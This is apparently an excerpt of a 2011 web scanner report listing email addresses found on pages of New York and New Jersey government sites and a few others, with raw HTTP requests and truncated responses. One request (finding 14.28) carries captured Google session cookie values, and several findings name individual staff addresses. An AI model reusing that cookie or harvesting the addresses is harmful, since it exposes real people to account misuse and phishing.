Severity:	Information
Confidence:	Certain
Host:	http://www.courts.state.ny.us
Path:	/whatsnew/

Issue detail

The following email address was disclosed in the response:

EFile@NYCourts.gov

Request

GET /whatsnew/ HTTP/1.1
Host: www.courts.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:54:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15053
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>What's New</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/globa
...[SNIP]...
<a href="mailto:EFile@NYCourts.gov">EFile@NYCourts.gov</a>
...[SNIP]...

14.25. http://www.delaware.gov/apps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.delaware.gov
Path:	/apps/

Issue detail

The following email address was disclosed in the response:

apps@delaware.gov

Request

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:55:18 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27398

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
       <head>
       
       <met
...[SNIP]...
<a href="mailto:apps@delaware.gov" style="text-decoration:underline;">apps@delaware.gov</a>
...[SNIP]...

14.26. http://www.facebook.com/feeds/page.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/feeds/page.php

Issue detail

The following email address was disclosed in the response:

webmaster@facebook.com

Request

GET /feeds/page.php?id=147895761925432&format=rss20 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.27. http://www.gnu.org/licenses/gpl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gnu.org
Path:	/licenses/gpl.html

Issue detail

The following email addresses were disclosed in the response:

gnu@gnu.org
web-translators@gnu.org
webmasters@gnu.org
you@example.com

Request

GET /licenses/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:32 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Wed, 13 Jul 2011 01:51:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email-Primary" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...

...[SNIP]...

14.28. http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Issue detail

The following email address was disclosed in the response:

dcollison@google.com

Request

GET /uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.state.nj.us/lottery/home.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=G8GXu_mu_V4v5YxE2RqVYl3gQcYLRg30PTyN25cOw1cLTLBKpupiwM_D9n2e3-VyC48S_mOn73wfajzGDfFiwn12C9Ufm9LtLqm9u-FMzXndz4J5LJqChVjL88zMCKHU

Response

HTTP/1.1 200 OK
Expires: Wed, 13 Jul 2011 01:43:05 GMT
Date: Wed, 13 Jul 2011 01:43:05 GMT
Last-Modified: Fri, 08 Jul 2011 01:03:24 GMT
Content-Type: application/x-javascript
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 24583
Server: GSE
Cache-Control: public, max-age=0
Age: 0

/**
* Copyright (c) 2008 Google Inc.
*
* You are free to copy and use this sample.
* License can be found here: http://code.google.com/apis/ajaxsearch/faq/#license
*/

/**
* @fileoverview A feed gadget based on the AJAX Feed API.
* @author dcollison@google.com (Derek Collison)
*/

/**
* GFdynamicFeedControl
* @param {String} feed The feed URL.
* @param {String|Object} container Either the id string or the element itself.
* @param {Object} options Optio
...[SNIP]...

14.29. http://www.governor.ny.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.governor.ny.gov
Path:	/

Issue detail

The following email address was disclosed in the response:

Empire.20@cio.ny.gov

Request

GET / HTTP/1.1
Host: www.governor.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.30. http://www.health.state.ny.us/health_care/epic/index.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.health.state.ny.us
Path:	/health_care/epic/index.htm

Issue detail

The following email address was disclosed in the response:

epic@health.state.ny.us

Request

GET /health_care/epic/index.htm HTTP/1.1
Host: www.health.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:34 GMT
Server: Apache/2.0.63 (Unix)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- INCLUDE HEADER Version 1.05 7/26/2007 PAGE LAST MODIFIED Tuesday, 28-Jun-2011 11:57:
...[SNIP]...
<a href="mailto:epic@health.state.ny.us">epic@health.state.ny.us</a>
...[SNIP]...

14.31. http://www.health.state.ny.us/vital_records/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.health.state.ny.us
Path:	/vital_records/

Issue detail

The following email address was disclosed in the response:

vr@health.state.ny.us

Request

GET /vital_records/ HTTP/1.1
Host: www.health.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:34 GMT
Server: Apache/2.0.63 (Unix)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- INCLUDE HEADER Version 1.05 7/26/2007 PAGE LAST MODIFIED Thursday, 31-Jan-2008 12:42
...[SNIP]...
<a href="mailto:vr@health.state.ny.us" title="Send an email to Vital Records">vr@health.state.ny.us</a>
...[SNIP]...
<a href="mailto:vr@health.state.ny.us">vr@health.state.ny.us</a>
...[SNIP]...

14.32. http://www.jerseyseafood.nj.gov/justforkids.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jerseyseafood.nj.gov
Path:	/justforkids.html

Issue detail

The following email address was disclosed in the response:

jerseyseafood@ag.state.nj.us

Request

GET /justforkids.html HTTP/1.1
Host: www.jerseyseafood.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:51:39 GMT
Content-length: 16084
Content-type: text/html
Last-modified: Tue, 21 Aug 2007 17:33:11 GMT
Etag: "3ed4-46cb21d7"
Accept-ranges: bytes
Connection: close

<html>

<head>

<title>NDJA - Seafood - Just For Kids</title>

<meta http-e
...[SNIP]...
<a href="mailto:jerseyseafood@ag.state.nj.us">jerseyseafood@ag.state.nj.us</a>
...[SNIP]...

14.33. http://www.judiciary.state.nj.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.judiciary.state.nj.us
Path:	/

Issue detail

The following email addresses were disclosed in the response:

NJMCDirectReply.mailbox@judiciary.state.nj.us
webmaster.mailbox@judiciary.state.nj.us

Request

GET / HTTP/1.1
Host: www.judiciary.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:39 GMT
Last-Modified: Tue, 12 Jul 2011 19:12:50 GMT
ETag: "ed-70bb-15fb1080"
Accept-Ranges: bytes
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http
...[SNIP]...
<a href="mailto:NJMCDirectReply.mailbox@judiciary.state.nj.us">
...[SNIP]...
<a href="mailto:webmaster.mailbox@judiciary.state.nj.us">
...[SNIP]...

14.34. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

Issue detail

The following email address was disclosed in the response:

a.fulciniti@html.it

Request

Response

14.35. http://www.nj.gov/donotcall/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nj.gov
Path:	/donotcall/

Issue detail

The following email address was disclosed in the response:

askconsumeraffairs@lps.state.nj.us

Request

GET /donotcall/ HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:53 GMT
Content-length: 35913
Content-type: text/html
Last-modified: Wed, 11 May 2011 19:38:04 GMT
Etag: "8c49-4dcae59c"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:askconsumeraffairs@lps.state.nj.us">
...[SNIP]...

14.36. http://www.njelections.org/how-where-register.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.njelections.org
Path:	/how-where-register.html

Issue detail

The following email address was disclosed in the response:

Feedback@sos.state.nj.us

Request

GET /how-where-register.html HTTP/1.1
Host: www.njelections.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:59 GMT
Content-length: 23223
Content-type: text/html
Last-modified: Thu, 28 Apr 2011 16:48:07 GMT
Etag: "5ab7-4db99a47"
Accept-ranges: bytes
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<a href="mailto:Feedback@sos.state.nj.us" class="moreLinks">Feedback@sos.state.nj.us</a>
...[SNIP]...

14.37. http://www.njfishandwildlife.com/als/websalesintro.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.njfishandwildlife.com
Path:	/als/websalesintro.htm

Issue detail

The following email addresses were disclosed in the response:

njfishandwildlife@dep.state.nj.us
njhfwebmaster@als-xtn.com

Request

GET /als/websalesintro.htm HTTP/1.1
Host: www.njfishandwildlife.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:00 GMT
Content-length: 39084
Content-type: text/html
Last-modified: Tue, 05 Jul 2011 17:27:57 GMT
Etag: "98ac-4e13499d"
Accept-ranges: bytes
Connection: close

<html>
<head>

<link rel="shortcut icon" href="../images/favicon.png" type="image/x-icon" />

<title>NJDEP Division of Fish & Wildlife - NJ Fishing and Hunting License Sales</title>

<!------- Met
...[SNIP]...
<a href="mailto:njhfwebmaster@als-xtn.com?subject=NJ License" class="listgreenul">njhfwebmaster@als-xtn.com</a>
...[SNIP]...
<a href="mailto:njfishandwildlife@dep.state.nj.us" class="listgreenul">njfishandwildlife@dep.state.nj.us</a>
...[SNIP]...

14.38. http://www.njleg.state.nj.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.njleg.state.nj.us
Path:	/

Issue detail

The following email addresses were disclosed in the response:

leginfo@njleg.org
webmaster@njleg.org

Request

GET / HTTP/1.1
Host: www.njleg.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 13 Jul 2011 01:50:00 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 86262
Content-Type: text/html
Expires: Tue, 12 Jul 2011 09:10:00 GMT
Set-Cookie: ASPSESSIONIDAADDSACS=EHFKMCHBKABALIEPADMHHJAI; path=/
Cache-control: private

<html>
<head>
<style type="text/css">
<!--

A.blk:link {color: #000000; text-decoration: none;}
A.blk:visited {color: #000000; text-decoration: none;}
A.blk:active {color: #910000; text-d
...[SNIP]...
<a href="mailto:leginfo@njleg.org">
...[SNIP]...
<a href="mailto:webmaster@njleg.org">
...[SNIP]...

14.39. http://www.njleg.state.nj.us/Default.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.njleg.state.nj.us
Path:	/Default.asp

Issue detail

The following email addresses were disclosed in the response:

leginfo@njleg.org
webmaster@njleg.org

Request

GET /Default.asp HTTP/1.1
Host: www.njleg.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 13 Jul 2011 01:49:59 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 86262
Content-Type: text/html
Expires: Tue, 12 Jul 2011 09:10:00 GMT
Set-Cookie: ASPSESSIONIDAADDSACS=BHFKMCHBAILGMCBNDLEBOAHM; path=/
Cache-control: private

<html>
<head>
<style type="text/css">
<!--

A.blk:link {color: #000000; text-decoration: none;}
A.blk:visited {color: #000000; text-decoration: none;}
A.blk:active {color: #910000; text-d
...[SNIP]...
<a href="mailto:leginfo@njleg.org">
...[SNIP]...
<a href="mailto:webmaster@njleg.org">
...[SNIP]...

14.40. http://www.ny.gov/contactus/accessibility.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ny.gov
Path:	/contactus/accessibility.html

Issue detail

The following email address was disclosed in the response:

policy@cio.ny.gov

Request

GET /contactus/accessibility.html HTTP/1.1
Host: www.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:49:40 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 01 Jan 2011 01:22:14 GMT
ETag: "9400f-4a2a-498bebfaf7d80"
Accept-Ranges: bytes
Content-Length: 18986
Cache-Control: max-age=60
Expires: Wed, 13 Jul 2011 01:50:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>WWW.NY.GOV / ACCESSIBILITY</title>
<script type="text/javascript" language="JavaScript" src="/nysbanner.js"></script
...[SNIP]...
<a href="mailto:policy@cio.ny.gov"><u>policy@cio.ny.gov</u>
...[SNIP]...

14.41. http://www.ny.gov/privacy/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ny.gov
Path:	/privacy/index.html

Issue detail

The following email address was disclosed in the response:

policy@cio.ny.gov

Request

GET /privacy/index.html HTTP/1.1
Host: www.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:49:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 01 Jan 2011 01:22:37 GMT
ETag: "53c001-669c-498bec10e7140"
Accept-Ranges: bytes
Content-Length: 26268
Cache-Control: max-age=60
Expires: Wed, 13 Jul 2011 01:50:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>WWW.NY.GOV / PRIVACY POLICY</title>
<script type="text/javascript" language="JavaScript" src="/nysbanner.js"></scrip
...[SNIP]...
<a href="mailto:policy@cio.ny.gov">policy@cio.ny.gov</a>
...[SNIP]...

14.42. http://www.nycourts.gov/ip/gfs/index.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nycourts.gov
Path:	/ip/gfs/index.shtml

Issue detail

The following email addresses were disclosed in the response:

GAN@Courts.State.NY.US
GFS@courts.state.ny.us

Request

GET /ip/gfs/index.shtml HTTP/1.1
Host: www.nycourts.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:52:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 14703
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Guardian&Fiduciary Services</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
<a href="mailto:GFS@courts.state.ny.us" class="gfsmenu">
...[SNIP]...
<a href="mailto:GAN@Courts.State.NY.US">
...[SNIP]...

14.43. http://www.nyfirst.ny.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nyfirst.ny.gov
Path:	/

Issue detail

The following email address was disclosed in the response:

NYfirst@empire.state.ny.us

Request

GET / HTTP/1.1
Host: www.nyfirst.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 20483
Content-Type: text/html
Content-Location: http://www.nyfirst.ny.gov/Index.html
Last-Modified: Fri, 11 Mar 2011 22:12:37 GMT
Accept-Ranges: bytes
ETag: "d77aef6d39e0cb1:209f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Date: Wed, 13 Jul 2011 01:49:48 GMT
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script t
...[SNIP]...
<a href="mailto:NYfirst@empire.state.ny.us">
...[SNIP]...

14.44. http://www.nyhealth.gov/nysdoh/chplus/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nyhealth.gov
Path:	/nysdoh/chplus/

Issue detail

The following email address was disclosed in the response:

chplus@health.state.ny.us

Request

GET /nysdoh/chplus/ HTTP/1.1
Host: www.nyhealth.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:12 GMT
Server: Apache/2.0.63 (Unix)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- INCLUDE HEADER Version 1.05 7/26/2007 PAGE LAST MODIFIED Wednesday, 25-May-2011 13:4
...[SNIP]...
<a href="mailto:chplus@health.state.ny.us">chplus@health.state.ny.us</a>
...[SNIP]...

14.45. http://www.nysegov.com/citguide.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nysegov.com
Path:	/citguide.cfm

Issue detail

The following email address was disclosed in the response:

nyecom@oft.state.ny.us

Request

GET /citguide.cfm?context=citguide&content=munibyalpha HTTP/1.1
Host: www.nysegov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.46. http://www.opensource.org/licenses/gpl-3.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/gpl-3.0.html

Issue detail

The following email addresses were disclosed in the response:

osi@opensource.org
webmaster@opensource.org

Request

GET /licenses/gpl-3.0.html HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.47. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

osi@opensource.org
webmaster@opensource.org

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.48. http://www.state.nj.us/jerseyfresh/searches/pyo.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/jerseyfresh/searches/pyo.htm

Issue detail

The following email address was disclosed in the response:

nancy.wood@ag.state.nj.us

Request

GET /jerseyfresh/searches/pyo.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:50 GMT
Content-length: 17969
Content-type: text/html
Last-modified: Wed, 19 Mar 2008 20:31:25 GMT
Etag: "4631-47e1781d"
Accept-ranges: bytes
Connection: close

<html>
<head>

<title>Jersey Fresh - Pick Your Own Fruits & Vegetables</title>
<!-- #EndEditable
...[SNIP]...
<a href="mailto:nancy.wood@ag.state.nj.us" class="footerLink">
...[SNIP]...

14.49. http://www.state.nj.us/lottery/about/6-0_about.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/about/6-0_about.htm

Issue detail

The following email address was disclosed in the response:

publicinfo@lottery.state.nj.us

Request

GET /lottery/about/6-0_about.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.50. http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/vip/3-0_vip_gen_info.htm

Issue detail

The following email address was disclosed in the response:

www.NewJerseyLottery@lottery.state.nj.us

Request

GET /lottery/vip/3-0_vip_gen_info.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.51. http://www.state.nj.us/lottery/where/4-0_where.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/where/4-0_where.htm

Issue detail

The following email addresses were disclosed in the response:

20maryann.rivell@lottery.state.nj.us
maryann.rivell@lottery.state.nj.us

Request

GET /lottery/where/4-0_where.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.52. http://www.state.nj.us/nj/feedback.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/nj/feedback.html

Issue detail

The following email addresses were disclosed in the response:

Webmaster.Mailbox@judiciary.state.nj.us
clmand@treas.state.nj.us
info@njpines.state.nj.us
locgov@gov.state.nj.us
njht@dca.state.nj.us

Request

GET /nj/feedback.html HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:52 GMT
Content-length: 11645
Content-type: text/html
Last-modified: Wed, 08 Jun 2011 10:23:13 GMT
Etag: "2d7d-4def4d91"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<h
...[SNIP]...
<a href="mailto:clmand@treas.state.nj.us" target="_blank">
...[SNIP]...
<a href="mailto:Webmaster.Mailbox@judiciary.state.nj.us">
...[SNIP]...
<a href="mailto:njht@dca.state.nj.us">
...[SNIP]...
<a href="mailto:info@njpines.state.nj.us">
...[SNIP]...
<a href="mailto:locgov@gov.state.nj.us">
...[SNIP]...

14.53. http://www.state.nj.us/patentbank/feedback/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/patentbank/feedback/

Issue detail

The following email addresses were disclosed in the response:

claire.welling@oit.state.nj.us
username@domain.com

Request

GET /patentbank/feedback/ HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:30 GMT
Content-length: 15387
Content-type: text/html
Last-modified: Wed, 26 Aug 2009 15:21:55 GMT
Etag: "3c1b-4a955313"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN
...[SNIP]...
field.");
       return_value = false;
   }else{
       if (!emailRe.test(email)){
           alert("You have not entered a valid email address. This is a required field.\nYou need to enter something in the forms of username@domain.com");
           return_value = false;
       }
   }

   if( name.length <= 0){
       return_value = false;
       alert("You have not entered a Name. This is a required field.");
   }

   if( phone.length <= 0){
       return_
...[SNIP]...
<!-- value="claire.welling@oit.state.nj.us">
...[SNIP]...

14.54. http://www.state.nj.us/treasury/privacy.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/privacy.shtml

Issue detail

The following email address was disclosed in the response:

webmaster@treas.state.nj.us

Request

GET /treasury/privacy.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:42 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>
<me
...[SNIP]...
<a href="https://www.state.nj.us/treas/webmaster.shtml">webmaster@treas.state.nj.us</a>
...[SNIP]...

14.55. http://www.state.nj.us/treasury/taxation/listservice.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/taxation/listservice.shtml

Issue detail

The following email address was disclosed in the response:

nj.taxationenews@treas.state.nj.us

Request

GET /treasury/taxation/listservice.shtml HTTP/1.1
Host: www.state.nj.us
Proxy-Connection: keep-alive
Referer: http://www.state.nj.us/treasury/taxation/relief.shtml
